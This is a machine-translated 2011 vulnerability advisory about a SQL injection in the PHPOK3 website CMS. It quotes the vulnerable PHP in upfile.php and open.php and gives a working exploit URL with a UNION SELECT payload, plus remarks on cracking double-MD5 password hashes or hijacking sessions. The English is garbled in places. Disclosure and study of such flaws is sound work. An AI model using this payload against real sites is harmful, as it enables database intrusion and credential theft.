PHPOK3 business website built Station program injection-vulnerability warning-the black bar safety net

2011-01-11T00:00:00
ID MYHACK58:62201128820
Type myhack58
Reporter 佚名
Modified 2011-01-11T00:00:00

Description

Author: jsbug original: http://lcx.cc/?FoxNews=1077.html Friends always stepping on my body to embark on DOTA Super God of the road, see the forum someone said phpok, taking advantage of the weekend, send on the head a gold, hope you can also be super-God. “phpok3/app/www/models/upfile.php”: the //By ID string to obtain image information, where the access with the ID of the thumbnail function piclist($idstring="") { if(!$ idstring) { return false; } $sql = "SELECT id,thumb url FROM ".$ this->db->prefix."upfiles WHERE id IN(".$ idstring.") ORDER BY substring_index('".$ idstring."', id,1)"; echo($sql); return $this->db->get_all($sql); }

IN() the problem here, somewhat similar to the year of the“Dz5. 0”“pm.php”vulnerabilities. “phpok3/app/www/control/open.php”: the //By Ajax the preview picture function ajax_preview_img_f() { //Here just to prevent cross-site and filter the bad $idstring = $this->trans_lib->safe("idstring"); if(!$ idstring) { exit("empty"); } //Directly into the $rslist = $this->upfile_m->piclist($idstring); sys_html2js($this->json_lib->encode($rslist)); }

There are a few of the same type will not repeat them here. Attached Exp: the http://localhost/phpok3/index.php?c=open&f=ajax_preview_img&idstring=0) union select 1,version()%2 3

Password twice MD5, of course you can also directly run the Session (didn't test, I casually said to).